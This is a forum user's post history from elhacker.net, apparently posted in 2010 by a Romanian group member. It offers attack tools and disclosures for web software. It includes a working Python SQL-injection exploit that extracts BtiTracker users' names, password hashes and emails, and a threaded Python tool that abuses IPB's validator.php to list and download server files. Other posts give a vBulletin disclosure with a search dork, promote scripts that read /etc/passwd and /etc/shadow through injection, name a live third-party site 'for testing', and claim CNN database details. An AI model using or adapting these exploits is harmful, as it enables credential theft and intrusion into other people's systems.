elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / BtiTracker 1.3.x - 1.4.x [EXPLOIT] en: 10 Junio 2010, 02:02 am
BtiTracker 1.3.x - 1.4.x  [EXPLOIT]

More HERE: http://blog.insecurity.ro/btitracker-1-3-x-1-4-x-exploit-tinkode/

Código:
#!/usr/bin/env python
#
################################################################################
# ______          ____                                      __      [ xpl0it ] #
#/\__  _\        /\  _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __  __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                   _________________   /\___/ #
#                                                   www.insecurity.ro   \/__/  #
#                                                                              #
################################################################################
#                    [ BtiTracker 1.3.X - 1.4.X Exploit ]                      #
#    Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff      #
################################################################################
#                   Because we care, we're security aware                      #
################################################################################
 
import sys, urllib2, re
 
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
    print "==============================================================="
    print "=               Discovered and coded by TinKode               ="     
    print "=                     www.InSecurity.ro                       ="
    print "=                                                             ="
    print "= Local Command:                                              ="
    print "= ./isr.py [http://webshit] [ID]                              ="
    print "=                                                             ="
    print "==============================================================="
    exit()
 
if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]
 
shit = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"
 
url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
print "\n"
print "============================================="
print "================= InSecurity ================"
print "============================================="
 
html = urllib2.urlopen(url).read()
slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
if len(slobod) > 0:
    print "ID       : " + str(id)
    print "Username : " + slobod[0][0]
    print "Password : " + slobod[0][1]
    print "EMail    : " + slobod[0][2]
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "Ai luat-o la gaoaza..."
     
#InSecurity.ro - Romania


2  Seguridad Informática / Nivel Web / SQL Injection Columns Finder @ ISR en: 8 Junio 2010, 00:00 am
Screenshot:



More here: http://blog.insecurity.ro/sql-injection-column-finder-in-php-%C2%A9-isr/

Online Tool: http://insecurity.ro/columnsfinder.php

Source Code: http://www.teamwork.insecurity.ro/xfiles/%5BPHP%5D-ISR-SQL-Injection-Column-Finder---v1.0--Public-Version-.ISR


Website for testing: http://www.beckerturm-immobilien.de/images.php?id=134

Bonus: The result it's text + audio, you must listen this! :)))

You can use google translate, to understand romanian language! :D
3  Seguridad Informática / Nivel Web / ISR SQL SunBurn – ISS en: 27 Mayo 2010, 14:24 pm
Description :
This is the alpha (testing) version of ISR SQL SunBurn – ISS.
The final version will contain more stuff, but it will remain private, this doesn’t mean that we won’t create a public version.

So what does ISR SQL SunBurn (ISS) do ?
ISS is a php script that extracts all the possible information from a MySQL injection. Info (here we I don’t refer to colons/tables/etc … maybe in the near future). It searches and loads over 350 files with the help of load_file() – (ex /etc/passwd, /etc/shadow, etc)

Why did we decide to build this “tool”?
It’s actually simple, it simplifies your work, and second of all, it’s a necessity.
Hope I didn’t bore you with the description, here’s the video presentation of it.

Video Demonstration Here:



Mirror HIGH QUALITY
: http://www.trilulilu.ro/InSecurity/153a786f8b20fd


Source: http://insecurity.ro/blog/isr-sql-sunburn-iss/

and I think, I posted in the right section (i don't know) ;)
4  Seguridad Informática / Nivel Web / ESET NOD32 Taiwan & Hong Kong en: 22 Marzo 2010, 02:03 am
More here:

NOD32 Taiwan: http://insecurity.baywords.com/index.php/eset-nod32-taiwan-full-disclosure/
NOD32 HongKong: http://insecurity.baywords.com/index.php/eset-nod32-hong-kong-hacked/
5  Seguridad Informática / Nivel Web / CNN Oracle SQL Injection en: 17 Febrero 2010, 22:49 pm
CNN Oracle SQL Injection

CNN vulnerable to SQL Injection
Citar

CNN

Vulnerable to Oracle Injection
#TinKode & skpx


Citar
CNN.com is among the world’s leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN’s world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN’s global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.

Website vulnerable: cgi.money.cnn.com

Informations:





Citar
Version : Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production





Citar
Main Database : MONEYP1.TURNER.COM





Citar
User : TIME_USR





Citar
Owner : SYS

Columns from “Time_Owner.F500_2009“:

Citar
[1] RANK
[2] COMPANY_ID
[3] NAME
[4] REVENUE
[5] REVENUE_GROWTH
[6] PROFIT
[7] PROFIT_GROWTH
[8] PROF_PCT_REVENUE
[9] PROF_PCT_ASSETS
[10] PROF_PCT_EQUITY
[11] EPS_10YR_GROWTH
[12] TRI_10YR
[13] TRI
[14] EMPLOYEES
[15] EMPLOYEE_GROWTH

# Thanks, and have a nice day!
# TinKode





6  Seguridad Informática / Nivel Web / InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python] en: 24 Enero 2010, 23:02 pm


Código:
#! /usr/bin/env python3.1

################################################################
#          _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#   | | | |__) | |_) |                           #
#   | | |  ___/|  _ <                            #
# _| |_| |    | |_) |                           #
#    |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################


import os, sys, urllib.request, urllib.parse, threading


def main():
    logo = """
\t |---------------------------------------------------------------|
\t |                      _____ _____  ____    (TM)                |
\t |                     |_   _|  __ \|  _ \                       |
\t |                       | | | |__) | |_) |                      |
\t |                       | | |  ___/|  _ <                       |
\t |                      _| |_| |    | |_) |                      |
\t |                     |_____|_|    |____/                       |
\t |                                                               |
\t |                                                               |
\t |                  IPB Full Disclosure expl0it                  |
\t |                      Written by cmiN                          |
\t |              Vulnerability discovered by TinKode              |
\t |                                                               |
\t |                                                               |
\t |         Visit: www.insecurity.ro & www.darkc0de.com           |
\t |---------------------------------------------------------------|
"""
    usage = """
         |---------------------------------------------------------------|
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           |
         |        ipbfd.py download *.zip -> all                         |
         |        ipbfd.py download name.jpg -> one                      |
         |---------------------------------------------------------------|"""
    if sys.platform in ("linux", "linux2"):
        clearing = "clear"
    else:
        clearing = "cls"
    os.system(clearing)
    print(logo)
    args = sys.argv
    if len(args) == 3:
        try:
            print("Please wait...")
            if args[1] == "scan":
                extract_parse_save(args[2].strip("/"))
            elif args[1] == "download":
                download_data(args[2])
        except Exception as message:
            print("An error occurred: {}".format(message))
        except:
            print("Unknown error.")
        else:
            print("Ready!")
    else:
        print(usage)
    input()


def extract_parse_save(url):
    print("[+]Extracting content...")
    hurl = url + "/validator.php"
    with urllib.request.urlopen(hurl) as usock:
        source = usock.read().decode()
    print("[+]Finding token...")
    word = "validate('"
    index = source.find(word)
    if index != -1:
        source = source[index + len(word):]
        value = source[:source.index("'")]
        hurl = url + "/validator.php?op={}".format(value)
    else:
        print("[!]Token not found.")
    print("[+]Obtaining paths...")
    with urllib.request.urlopen(hurl) as usock:
        lastk, lastv = None, None
        dictionary = dict()
        for line in usock:
            line = line.decode()
            index = line.find("<td>")
            if index != -1:
                lastk = line[index + 4:line.index("</td>")].strip(" ").strip("&nbsp;")
            index = line.find("<strong>")
            if index != -1:
                lastv = line[index + 8:line.index("</strong>")].strip(" ")
            if lastk != None and lastv != None:
                index = lastk.rfind(".")
                if index in (-1, 0):
                    lastk = "[other] {}".format(lastk)
                else:
                    lastk = "[{}] {}".format(lastk[index + 1:], lastk)
                dictionary[lastk] = lastv
                lastk, lastv = None, None
    print("[+]Organizing and saving paths...")
    with open("IPBlogs.txt", "w") as fout:
        fout.write(url + "\n")
        keys = sorted(dictionary.keys())
        for key in keys:
            fout.write("{} ({})\n".format(key, dictionary[key]))


def download_data(files):
    print("[+]Searching and downloading files...")
    mthreads = 50
    with open("vBlogs.txt", "r") as fin:
        url = fin.readline().strip("\n").strip("/")
        if files.find("*") == -1:
            hurl = url + "/" + files.strip("/")
            Download(hurl).start()
        else:
            ext = files[files.rindex(".") + 1:]
            for line in fin:
                pieces = line.strip("\n").split(" ")
                if pieces[0].count(ext) == 1:
                    upath = pieces[1]
                    hurl = url + "/" + upath.strip("/")
                    while threading.active_count() > mthreads:
                        pass
                    Download(hurl).start()
    while threading.active_count() > 1:
        pass


class Download(threading.Thread):

    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        try:
            with urllib.request.urlopen(self.url) as usock:
                data = usock.read()
                uparser = urllib.parse.urlparse(usock.geturl())
                pieces = uparser.path.split("/")
                fname = pieces[len(pieces) - 1]
                with open(fname, "wb") as fout:
                    fout.write(data)
        except:
            pass


if __name__ == "__main__":
    main()

You must have python 3.1 to work!
7  Seguridad Informática / Nivel Web / vBulletin nulled (validator.php) files/directories disclosure en: 20 Enero 2010, 20:24 pm
Código:
*\-----------------------------------------------------------------------------/*
       ____        _ _      _   _       (nulled)
      |  _ \      | | |    | | (_)
__   _| |_) |_   _| | | ___| |_ _ _ __
\ \ / /  _ <| | | | | |/ _ \ __| | '_ \
\ V /| |_) | |_| | | |  __/ |_| | | | |
  \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|
                  Full disclosure...
 
*\-----------------------------------------------------------------------------/*
 
Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php"
 
*\-----------------------------------------------------------------------------/*
 
Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i
nstalled...
 
*\-----------------------------------------------------------------------------/*
 
Exploit: http://www.website.com/vB_forum/validator.php
 
*\-----------------------------------------------------------------------------/*
 
Note: Work on many nulled versions (maybe all)
 
*\-----------------------------------------------------------------------------/*
 
Copyrights: http://tinkode.baywords.com
 
*\-----------------------------------------------------------------------------/*
 
Greetz: http://www.insecurity.ro, http://www.darkc0de.com
 
*\-----------------------------------------------------------------------------/*
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines